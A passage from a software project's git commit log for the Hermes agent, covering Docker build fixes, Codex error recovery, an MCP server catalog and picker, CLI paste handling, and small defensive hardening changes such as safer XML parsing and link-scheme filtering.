+ corepack from the upstream `node:22-bookworm-slim` image as a
multi-stage source, matching the existing `uv_source` and `gosu_source`
patterns in the Dockerfile. The Bookworm-based slim image is used so the
copied binary links against glibc 2.36, which runs cleanly on Debian 13
(trixie, glibc 2.41).

Changes:
- Add `FROM node:22-bookworm-slim@sha256:... AS node_source` stage
- Remove `nodejs npm` from `apt-get install` (now sourced from node_source)
- Add `ca-certificates` explicitly to apt install (was a transitive of
  the apt nodejs package; removing nodejs broke the chain and curl
  inside the build failed with "error setting certificate file")
- COPY node binary + npm + corepack from node_source; recreate the
  symlinks at /usr/local/bin/{npm,npx,corepack}
- Update the npm_config_install_links=false comment block — npm 10's
  default is already `install-links=false`, but we keep the env as
  defense-in-depth against future Node-source-version regressions

Future bumps to Node 24/26 are a one-line ARG change.

Validation:
- Built --no-cache against current origin/main; build succeeds in 1m42s
- Image size: 3.27 GB (pre-salvage-1 baseline) → 3.14 GB (this PR);
  net 130 MiB savings (60 MiB from this change alone vs current main —
  removing apt nodejs+transitive deps that duplicated what node bundles)
- Node 22.22.3 / npm 10.9.8 / esbuild 0.27.7 all run cleanly under
  trixie's glibc 2.41
- Standard image smoke (6/6), Node-version E2E (8/8), chown E2E from
  #19788 (6/6), TUI UID-remap E2E from #28851 (4/4) — 24 checks total

Co-authored-by: Prithvi Monangi <8312237+Prithvi1994@users.noreply.github.com>
2026-05-27 16:22:21 +10:00
Ben 22eb4d13f7 fix(docker): chown ui-tui and node_modules on UID remap so TUI esbuild works (#28851)
When HERMES_UID remaps the hermes user from 10000 to another UID
(e.g. matching the host user's UID for bind-mount ergonomics), the TUI
launcher's esbuild step fails:

  ✘ [ERROR] Failed to write to output file:
     open /opt/hermes/ui-tui/dist/entry.js: permission denied
  TUI build failed.

This is because the Dockerfile's build-time `chown -R hermes:hermes` on
`/opt/hermes/{.venv,ui-tui,node_modules}` (line 154) wrote UID 10000,
and stage2-hook.sh only re-chowned `.venv` on UID remap — leaving the
TUI build trees still owned by the old UID.

Extend the stage2 re-chown to include the same set as the build-time
chown: `.venv`, `ui-tui`, `node_modules`. These are the runtime-writable
trees under $INSTALL_DIR; everything else under /opt/hermes is read-only
at runtime so keeping it root-owned is fine.

Original fix targeted docker/entrypoint.sh which is now a deprecated shim;
retargeted to docker/stage2-hook.sh where the .venv chown moved during
the s6-overlay rework.

Co-authored-by: Andreas Steffan <623481+deas@users.noreply.github.com>
2026-05-27 15:41:48 +10:00
Ben 9eadb6805c fix(docker): targeted chown to preserve host file ownership in HERMES_HOME (#19795)
Replaces the recursive chown of $HERMES_HOME in stage2-hook.sh with a
targeted approach: chown the top-level dir (so hermes can create new subdirs)
plus the specific hermes-owned subdirectories (cron/, sessions/, logs/,
hooks/, memories/, skills/, skins/, plans/, workspace/, home/, profiles/) —
the same canonical list seeded by the s6-setuidgid mkdir -p block below.

Avoids clobbering host-side file ownership when $HERMES_HOME is a bind
mount that contains user-owned files not managed by hermes (issue #19788).

Original fix targeted docker/entrypoint.sh which is now a deprecated shim;
retargeted to docker/stage2-hook.sh where the recursive chown moved during
the s6-overlay rework.

Co-authored-by: Ptichalouf <1809721+ptichalouf@users.noreply.github.com>
2026-05-27 15:08:41 +10:00
Teknium b6ca56f651 fix(codex-responses): gracefully recover from invalid_encrypted_content (salvage #10144) (#33035)
* fix(codex-responses): gracefully recover from invalid_encrypted_content (salvage #10144)

When an OpenAI-compatible Responses API surface accepts an initial
request but later rejects the replayed `codex_reasoning_items`
encrypted blob with HTTP 400 `invalid_encrypted_content`, the
session previously got stuck retrying the same poisoned payload.

Recovery: classify the error as a dedicated FailoverReason, and on the
first hit disable encrypted reasoning replay for the rest of the
session, strip cached items from message history, and retry once.

Changes:
* error_classifier: add FailoverReason.invalid_encrypted_content
  branch in _classify_400 (before context_overflow so the messages
  that mention 'encrypted content … could not be verified' don't trip
  context heuristics), in _classify_by_error_code, and extend
  _extract_error_code to peek inside wrapped JSON in error.message and
  ignore the bare '400' as a code.
* agent_init: initialize `_codex_reasoning_replay_enabled = True` on
  every agent.
* run_agent: add AIAgent._disable_codex_reasoning_replay() helper
  that flips the flag and pops cached items.
* codex_responses_adapter: thread a `replay_encrypted_reasoning`
  kwarg through _chat_messages_to_responses_input so that when the
  flag is False we don't replay codex_reasoning_items.
* transports/codex.py: read `replay_encrypted_reasoning` from params,
  thread it into the adapter, and gate the
  `include=['reasoning.encrypted_content']` request hint on it.
* chat_completion_helpers: pass the agent's replay flag through to
  the transport.
* conversation_loop: in the retry loop, add an
  invalid_encrypted_content recovery branch that fires once per
  session, only when api_mode == codex_responses, only when replay is
  still enabled, and only when at least one assistant message in
  history actually carries cached reasoning items (otherwise the 400
  has nothing to do with our cache and the normal retry path handles
  it).
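
The gating conditions for the recovery branch can be sketched as a single
predicate. This is a minimal illustration, not the code in conversation_loop:
SessionState, has_cached_reasoning, should_recover and recover are
hypothetical names, and the message-dict shape is an assumption. Only the
codex_reasoning_items key and the four conditions come from the text above.

```python
from dataclasses import dataclass, field


@dataclass
class SessionState:
    # Hypothetical container; the real agent keeps this state on AIAgent.
    api_mode: str
    replay_enabled: bool = True
    messages: list = field(default_factory=list)


def has_cached_reasoning(messages):
    """True if any assistant message carries cached reasoning items."""
    return any(
        m.get("role") == "assistant" and bool(m.get("codex_reasoning_items"))
        for m in messages
    )


def should_recover(state, failover_reason):
    """All four conditions must hold for the one-shot recovery to fire."""
    return (
        failover_reason == "invalid_encrypted_content"
        and state.api_mode == "codex_responses"
        and state.replay_enabled
        and has_cached_reasoning(state.messages)
    )


def recover(state):
    """Disable replay for the rest of the session and strip cached items."""
    state.replay_enabled = False
    for m in state.messages:
        m.pop("codex_reasoning_items", None)
```

Because recover() flips replay_enabled, a second 400 in the same session no
longer satisfies should_recover and falls through to the normal retry path.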

Tests:
* test_error_classifier: new wrapped-JSON _extract_error_code case;
  new TestClassifyApiError cases proving the 400 is retryable with
  no fallback, that the broad message match doesn't catch a generic
  'parsed' message, and that the error code match is
  case-insensitive.
* test_run_agent_codex_responses: end-to-end test of the recovery
  branch firing once and disabling replay, plus a sibling test that
  proves the branch does *not* fire (and the flag stays True) when
  history has no cached reasoning items.

Salvages PR #10144 onto the post-refactor module layout
(error_classifier / codex_responses_adapter / transports/codex /
conversation_loop / agent_init) since the original diff was written
against the pre-refactor monolithic run_agent.py.

* chore(release): map victorGPT in AUTHOR_MAP for #10144 salvage

---------

Co-authored-by: victorGPT <wuxuebin1993@gmail.com>
2026-05-26 22:01:17 -07:00
Jeffrey Quesnelle 9d3e9316f4 Merge pull request #29591 from NousResearch/jq/hermes-update-branch-flag
feat(cli): add --branch flag to `hermes update`
2026-05-27 00:57:37 -04:00
emozilla 3d9a26afad Merge remote-tracking branch 'origin/main' into jq/hermes-update-branch-flag 2026-05-27 00:48:25 -04:00
Ben 1e5884e38f refactor(docker): drop build-essential from apt install (#27507)
build-essential is a Debian metapackage (libc6-dev + gcc + g++ + make + dpkg-dev).
The Dockerfile already installs gcc + python3-dev + libffi-dev explicitly,
which covers the C-ext compile cases lazy_deps may hit at first boot.
g++/make/dpkg-dev aren't reached by the resolved [all]+[messaging] tree
on current main — verified via uv sync --dry-run on cp313-linux.

Co-authored-by: Monty Taylor <mordred@inaugust.com>
2026-05-27 14:35:19 +10:00
Ben Barclay 81a4f280d2 Merge pull request #22534 from wesleysimplicio/fix/voice-mode-docker-respect-pulse-pipewire
fix(voice): honor PULSE_SERVER/PIPEWIRE_REMOTE inside Docker (#21203)
2026-05-27 13:59:12 +10:00
teknium1 9feadc2734 chore(release): map ticketclosed-wontfix noreply to GitHub login 2026-05-26 20:51:59 -07:00
Nick 0a83247e9f feat: add TUI session orchestrator
Add a first-class active-session orchestrator for the Ink TUI:

- list, activate, close, and launch live process-local TUI sessions
- hydrate committed and in-flight output when switching sessions
- dispatch a new prompt session from the +new row with session-scoped model picks
- expose a clickable live-session count in the status chrome
- preserve stable row order while initially focusing the current session
- support mouse hit-testing for floating orchestrator overlays
- add backend and frontend regression coverage for the lifecycle and UI helpers
2026-05-26 20:51:59 -07:00
beardthelion 2fc77c53f0 feat(opencode-go): route qwen3.7-max via anthropic_messages
qwen3.7-max on OpenCode Go rejects the OpenAI-compatible (oa-compat)
format with HTTP 401 but works correctly via the Anthropic Messages
endpoint (/v1/messages with x-api-key auth).  Route it the same way
MiniMax models are routed: anthropic_messages api_mode.

Changes:
- hermes_cli/models.py: add qwen3.7-max routing + curated list
- hermes_cli/setup.py: add to setup wizard model list
- hermes_cli/auth.py: update provider comment
- tests: add assertions for qwen3.7-max api_mode routing
2026-05-26 20:44:43 -07:00
Ben Barclay 3c7f786ade Merge pull request #31557 from yu-xin-c/codex/docs-xurl-docker-home-29108
docs: clarify xurl auth HOME in Docker
2026-05-27 13:42:51 +10:00
Ben Barclay 7d94eee0a9 Merge pull request #32122 from yu-xin-c/codex/docs-docker-audio-bridge-32009
docs: add Docker audio bridge notes
2026-05-27 13:42:36 +10:00
Ben Barclay 628aaea63a Merge pull request #32412 from jonpol01/fix/docker-env-propagation
fix(docker): propagate env through s6 to cont-init and main CMD
2026-05-27 13:42:26 +10:00
Ben Barclay 840f79ed12 Merge pull request #31031 from Sunil123135/feat/windows-docker-desktop
feat(docker): add Windows Docker Desktop compatible compose file
2026-05-27 13:41:16 +10:00
Will Falcon bba50977bc fix: parse Codex image generation SSE directly 2026-05-26 20:40:29 -07:00
Teknium 16e86ce6a7 chore(release): map wangpuv contributor email for #32933 (#33005)
Pre-stages the AUTHOR_MAP entry so the contributor-check workflow
passes when Will Falcon's image-gen SSE fix lands.
2026-05-26 20:40:17 -07:00
Ben Barclay 1e267c4859 Merge pull request #29025 from slowtokki0409/codex/ignore-local-runtime-files
Ignore local Hermes runtime files
2026-05-27 13:20:01 +10:00
Teknium 2a8d217417 chore(release): map carltonawong noreply to GitHub login
Added AUTHOR_MAP entry for the cherry-picked fix in the preceding
commit so the release contributor audit can resolve Carlton's noreply
email.
2026-05-26 19:37:37 -07:00
Carlton 43a3f119fc fix(agent): recover Codex streams with null output 2026-05-26 19:37:37 -07:00
Teknium bb4703c761 docs(auth): replace stale 'hermes login' references with 'hermes auth add'
'hermes login' was removed (the command now just prints a deprecation
message and exits). The bundled hermes-agent SKILL.md, in-code error
messages, the tip rotation, the proxy adapters, and the docs site
still pointed agents and users at the dead command — so models loading
the skill kept running 'hermes login --provider openai-codex' and
getting a dead-end print.

Replacements use the canonical 'hermes auth add <provider>' surface
(or bare 'hermes auth' for the interactive manager).

Files:
- skills/autonomous-ai-agents/hermes-agent/SKILL.md (+ regenerated docs page)
- hermes_cli/tips.py (tip rotation)
- agent/google_oauth.py (gemini-cli error message)
- agent/conversation_loop.py (nous re-auth troubleshooting line)
- agent/credential_sources.py (docstring)
- hermes_cli/proxy/cli.py + hermes_cli/proxy/adapters/nous_portal.py (proxy auth hints)
- tests/hermes_cli/test_proxy.py (updated assertions)
- website/docs/reference/faq.md, website/docs/user-guide/features/subscription-proxy.md
- zh-Hans i18n mirrors for the above

'hermes logout' is still a live command and is left untouched.
The 'hermes login' stub in hermes_cli/auth.py:login_command() and
the cli-commands.md 'Deprecated' rows are intentionally kept as
the discoverable deprecation surface.
2026-05-26 15:41:11 -07:00
teknium1 f05a47309e fix(gateway): refresh cached agent tools on /reload-mcp
When the gateway processes /reload-mcp, it reconnects MCP servers and
updates the global _servers registry, but cached AIAgent instances in
_agent_cache keep the tools list they were built with. The user had to
also run /new (discarding conversation history) before the agent could
see the new tools — even though /reload-mcp had succeeded.

This patch refreshes each cached agent's .tools and .valid_tool_names
in _execute_mcp_reload after discovery returns, so existing sessions
pick up new MCP tools on their next turn. The slash-confirm gate in
_handle_reload_mcp_command already obtains user consent for the
implied prompt-cache invalidation before this code runs.

Mirrors what the CLI already does in cli.py _reload_mcp. Per-agent
enabled_toolsets and disabled_toolsets are preserved so an agent that
was scoped to a subset of toolsets does not silently gain disabled
tools after the reload.

Original diagnosis + initial implementation in #23812 from @fujinice.
The auto-reload watcher half of that PR is intentionally dropped —
users want /reload-mcp to remain explicit.

Co-authored-by: fujinice <45688690+fujinice@users.noreply.github.com>
2026-05-26 14:28:51 -07:00
teknium1 556bf7c5c1 test(cron): guard schedule-required description text on CRONJOB_SCHEMA 2026-05-26 14:09:37 -07:00
ygd58 51013268cf fix(cron): clarify schedule is required for create in tool schema
Grok models (and other LLMs) sometimes omit the schedule parameter
when calling the cronjob tool with action=create because the schema
only listed 'action' in required[] and the schedule description did
not explicitly state it was mandatory (issue #32427).

Fix: update schema descriptions to clearly state schedule is REQUIRED
for action=create, making this explicit for models that rely on
description text for parameter compliance.

Fixes #32427
2026-05-26 14:09:37 -07:00
Teknium ccd3d04fc5 chore(models): swap qwen3.6-plus → qwen3.7-max in openrouter+nous lists (#32809)
Updates curated picker lists for both the OpenRouter fallback snapshot
(`OPENROUTER_MODELS`) and the Nous Portal list (`_PROVIDER_MODELS['nous']`).
Regenerates website/static/api/model-catalog.json via
`scripts/build_model_catalog.py` to keep the docs-hosted manifest in
sync (drift guard in `test_in_repo_lists_match_manifest`).

tests/hermes_cli/test_models.py fixtures updated — they pinned the
old model id as their live-fetch sample.
2026-05-26 14:01:47 -07:00
Teknium 8b69ec03af feat(mcp): Nous-approved MCP catalog with interactive picker (#30870)
* feat(mcp): Nous-approved MCP catalog with interactive picker

Adds an optional-mcps/ directory mirroring optional-skills/: curated,
Nous-approved MCP servers shipped with the repo but disabled by default.
Presence in optional-mcps/ = approval. No community tier, no trust signals.
Entries are added by merging a PR.

New surface:
  hermes mcp                       Interactive catalog picker (default)
  hermes mcp catalog               Plain-text list, scriptable
  hermes mcp install <name>        Install a catalog entry

Picker behavior:
  not installed   -> install (clone/bootstrap if needed, prompt for creds)
  installed/off   -> enable
  installed/on    -> menu (disable / uninstall / reinstall)

Manifest schema (manifest_version: 1) supports:
- transport: stdio (command/args, ${INSTALL_DIR} substitution) or http (url)
- install: optional git clone + bootstrap commands (for repos that need
  local venv setup, like the n8n bridge); omit for npx/uvx servers
- auth: api_key (prompts -> ~/.hermes/.env), oauth (provider-mediated
  or native MCP), or none

Catalog entries are never auto-updated. Users re-run `hermes mcp install`
to refresh. Credentials always go to ~/.hermes/.env (the .env-is-for-secrets
rule), never to per-server env blocks.

Ships n8n as the reference manifest (https://github.com/CyberSamuraiX/hermes-n8n-mcp).

Tests: 19 catalog tests + E2E install/uninstall round-trip via the shipped
manifest.

* feat(mcp): tool-selection checklist + Linear catalog entry

Adds install-time tool selection so users only enable the MCP tools they
actually want, and ships Linear as a second reference catalog entry to
demonstrate the http+oauth path alongside n8n's stdio+api_key+git-bootstrap.

Tool selection flow:
  install (clone/auth/credentials) ->
  probe server for available tools ->
  curses checklist with pre-checked rows ->
  write mcp_servers.<name>.tools.include

Pre-check priority:
  1. user's prior tools.include  (reinstall preserves selection)
  2. manifest's tools.default_enabled  (curated subset)
  3. all probed tools  (default)
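
The priority order above could be expressed roughly as follows. This is a
sketch under assumptions: prechecked_tools is a hypothetical helper, and
dropping names the probe no longer reports is an illustrative choice rather
than confirmed behavior.

```python
def prechecked_tools(probed, prior_include=None, manifest_default=None):
    """Pick which probed tools start checked, in priority order."""
    if prior_include:
        wanted = set(prior_include)      # 1. reinstall keeps the user's pick
    elif manifest_default:
        wanted = set(manifest_default)   # 2. curated subset from the manifest
    else:
        return list(probed)              # 3. everything the probe returned
    # Keep probe order; ignore names the server no longer offers (assumption).
    return [tool for tool in probed if tool in wanted]
```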

Probe-failure fallback (server unreachable, OAuth not yet complete,
backing service offline):
  - manifest declared default_enabled -> applied directly
  - no default declared -> no filter written (all-on when reachable)
  - both cases point user at hermes mcp configure <name>

Manifest schema additions:
  tools:
    default_enabled: [list, of, tool, names]   # optional

Updates:
  - optional-mcps/linear/manifest.yaml -- new reference entry (http+oauth)
  - optional-mcps/n8n/manifest.yaml -- tools.default_enabled set to the
    8 read-mostly tools; mutating tools (activate/deactivate, container_logs)
    pruned by default
  - docs: new 'Tool selection at install time' section in features/mcp.md

Tests: 7 new tests in TestToolSelection covering probe-success / probe-fail
matrix, manifest-default filtering, reinstall-preserves-selection, and
invalid-default-enabled rejection. 26 catalog tests + 32 existing
mcp_config tests passing.

* feat(mcp): polish — picker unification, include-mode convergence, hardening

Addresses review findings on PR #30870. Lands all improvements that
belong in this PR before merge; defers separate cleanup (consolidating
two probe implementations, change-detector tests) to follow-ups.

Picker UX (mcp_picker.py)
- Unifies catalog + custom (user-added) MCPs in one view with distinct
  status badges (available / enabled / installed (disabled) /
  custom — enabled / custom — disabled)
- Adds 'Configure tools (probe server + re-pick)' action to both the
  catalog-installed and custom-row submenus — the existing
  hermes mcp configure flow was previously unreachable from the picker
- Loops until ESC/q so the user can manage several entries in one
  session instead of having to re-launch
- Uninstall message now mentions .env credentials are preserved with a
  pointer to clean them up manually if no longer needed
- Surfaces a 'requires a newer Hermes' warning per future-manifest
  entry instead of silently hiding it

Catalog (mcp_catalog.py)
- catalog_diagnostics() exposes which manifests were skipped and why
  (future_manifest vs invalid) so UIs can give actionable feedback
- _do_git_install detects SHA-shaped refs (regex /[0-9a-f]{7,40}/)
  and skips the doomed 'git clone --branch <sha>' attempt — clone --branch
  only accepts branches/tags, so SHAs always failed noisily before
  falling back to the full-clone path
- Probe-success all-tools-enabled message now mentions that new tools
  the server adds later will be auto-enabled (no-filter mode)
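
A minimal sketch of the SHA-shaped ref check, assuming the regex is applied
to the whole ref. looks_like_sha and clone_command are hypothetical names;
the real logic lives in _do_git_install, and the checkout step that follows
a full clone is omitted here.

```python
import re

# Same character class and length bounds as the regex quoted above.
_SHA_RE = re.compile(r"[0-9a-f]{7,40}")


def looks_like_sha(ref):
    """True when the whole ref is 7 to 40 lowercase hex characters."""
    return _SHA_RE.fullmatch(ref) is not None


def clone_command(url, ref, dest):
    """Build the git argv; only branch or tag refs get --branch."""
    if ref and not looks_like_sha(ref):
        return ["git", "clone", "--branch", ref, url, dest]
    # SHA (or no ref): full clone, then check out the commit separately.
    return ["git", "clone", url, dest]
```

One caveat of this heuristic: a branch whose name happens to be all hex
(for example "deadbeef") is treated as a SHA and takes the full-clone path.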

Convergence (tools_config.py)
- _configure_mcp_tools_interactive now writes tools.include (whitelist)
  instead of tools.exclude (blacklist), matching the catalog flow and
  hermes mcp configure. The on-disk config shape no longer depends on
  which UI the user touched last
- Two existing tests updated to assert the new include-mode contract

Discoverability
- Setup wizard final step now prints 'Browse curated MCPs: hermes mcp'
- Three tip-corpus entries pointing at the new catalog
- Docs updated with: trust model (manifests run code locally, gated by
  PR review, but read before installing), runtime ${ENV_VAR} substitution
  semantics, and the manifest_version forward-compat behavior

Tests
- 7 new tests covering future-manifest diagnostics, custom MCP picker
  rows, SHA-ref git-install path, branch-ref git-install path, and the
  tools_config include-mode write contract
- 80 MCP-related tests passing across test_mcp_catalog.py,
  test_mcp_config.py, test_mcp_tools_config.py

* fix(mcp): drop setup-wizard catalog hint to satisfy supply-chain scanner

The wizard line 'Browse curated MCPs: hermes mcp' triggered the
CI supply-chain scanner because it pattern-matches on edits to any
file named hermes_cli/setup.py — that filename matches the Python
'install-hook file' heuristic even though this setup.py is the
user-facing 'hermes setup' wizard, not a packaging install hook.

The catalog is already surfaced via three tip-corpus entries in
hermes_cli/tips.py (which the scanner doesn't flag), so dropping the
wizard mention loses no discoverability. Worth revisiting after a
scanner allowlist for this specific file lands.
2026-05-26 12:48:14 -07:00
Teknium 2517917de3 fix(cli): restore fallback paste collapse + handle long single-line pastes (#32447)
Follow-up to #32087 after community report from @ethernet that 8000-char
single-line pastes get dumped raw into the input box.

A) Fallback regression revert
   paste_collapse_threshold_fallback default: 0 -> 5
   #32087 disabled the fallback handler by default. The fallback path
   had been always-on with line_count >= 5 since #3065 (March 2026);
   the off-by-default shape was the salvaged contributor's design and
   didn't match pre-existing behavior for terminals without bracketed
   paste support (Windows terminals, some SSH setups). Restoring the
   original on-by-default behavior.

B) Long single-line paste guard
   New config key: paste_collapse_char_threshold (default 2000)
   Bracketed-paste handler and fallback handler now BOTH collapse when
   line count >= line threshold OR total char length >= char threshold.
   Catches the case ethernet hit: ~8000 chars of minified JSON / log
   output on a single line dumped raw into the buffer.
   TUI mirrors the same config via uiStore.pasteCollapseChars.
   Set 0 to disable.

Defaults verified:
  paste_collapse_threshold: 5
  paste_collapse_threshold_fallback: 5
  paste_collapse_char_threshold: 2000
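
The combined rule can be sketched as below, using the defaults listed above.
should_collapse is a hypothetical name, the way lines are counted is an
assumption, and treating 0 as "disabled" for the line threshold as well as
the char threshold is inferred from the earlier fallback default of 0.

```python
def should_collapse(text, line_threshold=5, char_threshold=2000):
    """Collapse when either the line count or the total length is large."""
    line_count = text.count("\n") + 1
    by_lines = line_threshold > 0 and line_count >= line_threshold
    by_chars = char_threshold > 0 and len(text) >= char_threshold
    return by_lines or by_chars
```

With this shape an 8000-character single-line paste collapses on the char
check alone, while a short four-line paste stays inline.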

Tests:
  tests/hermes_cli/test_config.py: 87/87 pass
  ui-tui useConfigSync.test.ts: 34/34 pass
  ui-tui useComposerState.test.ts: 9/9 pass
  tsc: 0 new errors in touched files
2026-05-25 23:49:01 -07:00
Teknium 31c8d5ff5f chore(wecom): make defusedxml dep acquirable and tolerant of absence
Follow-up on top of @TheOnlyMika's #32155 cherry-pick. The defusedxml
hardening import was unconditional, which would break the gateway for
anyone running a WeComCallback adapter without the (transitive-only)
defusedxml present.

- Wrap the import in the same try/except pattern as aiohttp/httpx in
  the same file. Sets DEFUSEDXML_AVAILABLE flag.
- Extend check_wecom_callback_requirements() to gate on the flag, so
  the gateway logs the actual missing dep and skips the adapter
  instead of crashing.
- Add [wecom] extra to pyproject.toml with defusedxml==0.7.1.
- Register platform.wecom_callback in tools/lazy_deps.py so users get
  prompted to install it on first WeComCallback configuration, same
  pattern as discord/slack/matrix.
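
The guarded-import pattern looks roughly like this. It is a sketch, not the
adapter's code: check_requirements and its return shape are hypothetical
stand-ins for check_wecom_callback_requirements(), and SafeET is an
illustrative alias.

```python
try:
    # defusedxml ships a hardened drop-in for xml.etree.ElementTree.
    from defusedxml import ElementTree as SafeET
    DEFUSEDXML_AVAILABLE = True
except ImportError:
    SafeET = None
    DEFUSEDXML_AVAILABLE = False


def check_requirements():
    """Return (ok, missing) so the caller can log the missing dependency."""
    missing = []
    if not DEFUSEDXML_AVAILABLE:
        missing.append("defusedxml")
    return (not missing, missing)
```

The point of the flag is that a missing package turns into a skipped adapter
with a clear log line instead of an ImportError at gateway start.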

defusedxml is still the right call for pre-auth XML parsing — this
commit just makes the dep declarative and recoverable instead of a
hard import-time crash.
2026-05-25 23:30:43 -07:00
TheOnlyMika 5744b17579 harden: restrict markdown link schemes; parse untrusted XML with defusedxml
Two small defensive-hardening changes:

- web/src/components/Markdown.tsx: render links only for http(s)/mailto
  schemes; other schemes (javascript:, data:, vbscript:) are dropped to
  plain text so a crafted link in rendered content can't execute on click.

- gateway/platforms/wecom_callback.py: parse the untrusted, pre-auth WeCom
  callback request body with defusedxml instead of xml.etree, blocking
  entity-expansion / billion-laughs (and XXE) on the parse path. defusedxml
  is already a dependency (uv.lock); response-building XML in
  wecom_crypto.py is unchanged (it is not parsed from untrusted input).

Verified: dashboard typechecks and builds; defusedxml blocks an
entity-expansion payload while valid WeCom envelopes still parse.
2026-05-25 23:30:43 -07:00
dearmayo f4953bc648 fix(subdirectory_hints): prevent loading AGENTS.md outside workspace
SubdirectoryHintTracker was scanning directories outside the active
working directory, allowing files like ~/.codex/AGENTS.md or
~/.claude/CLAUDE.md to be loaded and injected into the agent context.
This causes cross-agent context contamination and instruction mixup.

Add _is_ancestor_or_same() helper and a path boundary check in
_is_valid_subdir(): only directories within the working directory tree
(i.e. path.is_relative_to(working_dir)) are allowed.
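
A minimal sketch of such a boundary check, assuming both paths are resolved
before comparison. is_within_workspace is a hypothetical name, not the
helper added in this commit, and Path.is_relative_to requires Python 3.9+.

```python
from pathlib import Path


def is_within_workspace(candidate, working_dir):
    """True only if candidate is working_dir or lives somewhere beneath it."""
    root = Path(working_dir).resolve()
    target = Path(candidate).resolve()
    # Component-wise comparison, so "/work/repo-sibling" is not inside "/work/repo".
    return target.is_relative_to(root)
```

Resolving first matters: a path such as "repo/../other" would otherwise pass
a naive string-prefix test while pointing outside the workspace.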

Also add exist_ok=True to mkdir() calls in new tests to prevent
pytest-xdist race conditions when workers share the same tmp_path parent.

Tests added:
- test_outside_working_dir_rejected: verifies sibling dirs are blocked
- test_outside_working_dir_absolute_path_rejected: verifies ~/.codex paths are blocked
- test_inside_workspace_subdir_allowed: verifies normal subdir access unaffected
- test_sibling_repo_not_loaded_via_ancestor_walk: ancestor walk stays within workspace
2026-05-25 23:17:33 -07:00
Krisli Dimo 9d10c45e32 fix(telegram): tighten table row-group spacing and drop redundant first bullet
The GFM → Telegram-row-group rewriter previously joined every line in
every row with a blank line ("\n\n".join(rendered_rows)), which made
multi-column tables explode into one-bullet-per-paragraph walls on
mobile.  It also emitted the row heading twice when the table had no
row-label column: once as the standalone bold heading and once again
as the first labeled bullet (heading == headers[0] == data_cells[0]).

This commit:

* Uses single newlines between the heading and its bullets within a
  row-group, and a blank line only BETWEEN row-groups.
* Skips any bullet whose value duplicates the heading text when the
  table has no row-label column (the heading already carries that
  information).  Tables WITH a row-label column are unaffected since
  the heading comes from the label cell and never duplicates a header.
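
The two rules can be illustrated with a small renderer. Everything about the
output format here is an assumption (the bold markers, the "- " bullets, the
render_row_groups name, and how a label column is detected); only the
spacing and dedup rules come from the description above.

```python
def render_row_groups(headers, rows, has_label_column=False):
    """Render each table row as a heading followed by labeled bullets."""
    groups = []
    for cells in rows:
        heading = cells[0]
        pairs = list(zip(headers, cells))
        if has_label_column:
            # The label cell is used only as the heading.
            pairs = pairs[1:]
        else:
            # Drop bullets whose value just repeats the heading.
            pairs = [(h, v) for h, v in pairs if v != heading]
        lines = [f"**{heading}**"] + [f"- {h}: {v}" for h, v in pairs]
        groups.append("\n".join(lines))   # single newlines inside a group
    return "\n\n".join(groups)            # blank line only between groups
```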

Updated existing test assertions accordingly and added two regression
tests: one that reproduces the screenshot bug (wide five-column "Plays"
comparison table) and one that pins the row-label-column behavior so
the dedup logic doesn't accidentally swallow real data.

tests/gateway/test_telegram_format.py: 101 passed
2026-05-25 23:16:00 -07:00
kshitij 66851dc413 chore: add krislidimo to AUTHOR_MAP for PR #29775 (#32434) 2026-05-25 23:15:56 -07:00
Teknium d8703e27f5 feat(skills-hub): health checks, freshness badge, and a watchdog cron (#32345)
Layered safety so the Skills Hub at /docs/skills stays in sync without
silent rot. Three pieces:

1. build_skills_index.py — refuses to ship a degenerate index.
   EXPECTED_FLOORS per source (skills.sh ≥100, lobehub ≥100, clawhub ≥50,
   official ≥50, github ≥30, browse-sh ≥50) and MIN_TOTAL=1500. Any source
   collapsing to zero (the silent OpenAI breakage that hid for weeks) now
   fails the workflow loudly, so a broken index never reaches the live site.

2. extract-skills.py + the React page — visible freshness signal.
   Sidecar website/src/data/skills-meta.json carries the index's
   generated_at timestamp, plus per-source counts. Skills Hub renders a
   'Catalog refreshed N hours ago · auto-rebuilt twice daily' line under
   the hero copy. If the cron stalls, users see the staleness immediately.

3. .github/workflows/skills-index-freshness.yml — watchdog cron.
   Every 4 hours, fetches the live /docs/api/skills-index.json, validates
   shape, checks age (>26h is stale), checks the same per-source floors,
   and opens (or appends to) a GitHub issue when anything is off. The
   issue is title-prefixed [skills-index-watchdog] so subsequent failures
   append a comment instead of spamming new issues.
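
The floor and staleness checks shared by the build step and the watchdog
could look roughly like this. The floors, MIN_TOTAL and the 26-hour limit
are taken from the text above; index_problems, the counts-dict shape, and
computing the total as the sum of per-source counts are assumptions.

```python
from datetime import datetime, timedelta, timezone

EXPECTED_FLOORS = {
    "skills.sh": 100,
    "lobehub": 100,
    "clawhub": 50,
    "official": 50,
    "github": 30,
    "browse-sh": 50,
}
MIN_TOTAL = 1500
MAX_AGE = timedelta(hours=26)


def index_problems(counts, generated_at, now):
    """Return human-readable problems; an empty list means healthy."""
    problems = []
    for source, floor in EXPECTED_FLOORS.items():
        found = counts.get(source, 0)
        if found < floor:
            problems.append(f"{source}: {found} below floor {floor}")
    total = sum(counts.values())
    if total < MIN_TOTAL:
        problems.append(f"total {total} below {MIN_TOTAL}")
    if now - generated_at > MAX_AGE:
        problems.append("index is stale")
    return problems
```

A build step would exit non-zero on a non-empty list, while the watchdog
would turn the same list into the body of the GitHub issue or comment.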

Net effect:
- A silent regression like 'OpenAI tap moved its skills' now fails the
  build instead of shipping a quietly broken catalog.
- A stuck cron (like the landingpage breakage that ran red for weeks) now
  files an issue within 4 hours.
- Users see how fresh the catalog is on the page itself.

Test plan:
- Local: built skills-meta.json from the live index → 'Catalog refreshed
  N minutes ago' rendered correctly in the static HTML.
- Probe logic dry-run against the live index: total=2456, all 6 sources
  above floor, age 0.1h — issues=NONE.
- Triggered skills-index.yml manually; both jobs green, deploy-site.yml
  dispatch fired.
2026-05-25 23:10:45 -07:00
John Paul Soliva 29c71e972a fix(docker): propagate container env through s6 to cont-init and main CMD
s6-overlay's /init scrubs the environment before invoking both
/etc/cont-init.d/* scripts and the container's CMD wrapper. As a
result, ENV directives from the Dockerfile (HERMES_HOME=/opt/data,
HERMES_WEB_DIST, …) and compose-time `environment:` entries
(HERMES_UID, HERMES_GID) never reached the scripts that actually
use them. Three concrete failures observed on macOS Docker Desktop
with `~/.hermes:/opt/data`:

* stage2-hook.sh ran with HERMES_UID unset → no UID remap, hermes
  user stayed at UID 10000 instead of the host user's UID.
* skills_sync.py (invoked from stage2-hook) ran with HERMES_HOME
  unset → get_hermes_home() fell back to Path.home()/.hermes,
  populating a shadow $HERMES_HOME/.hermes/skills tree on the
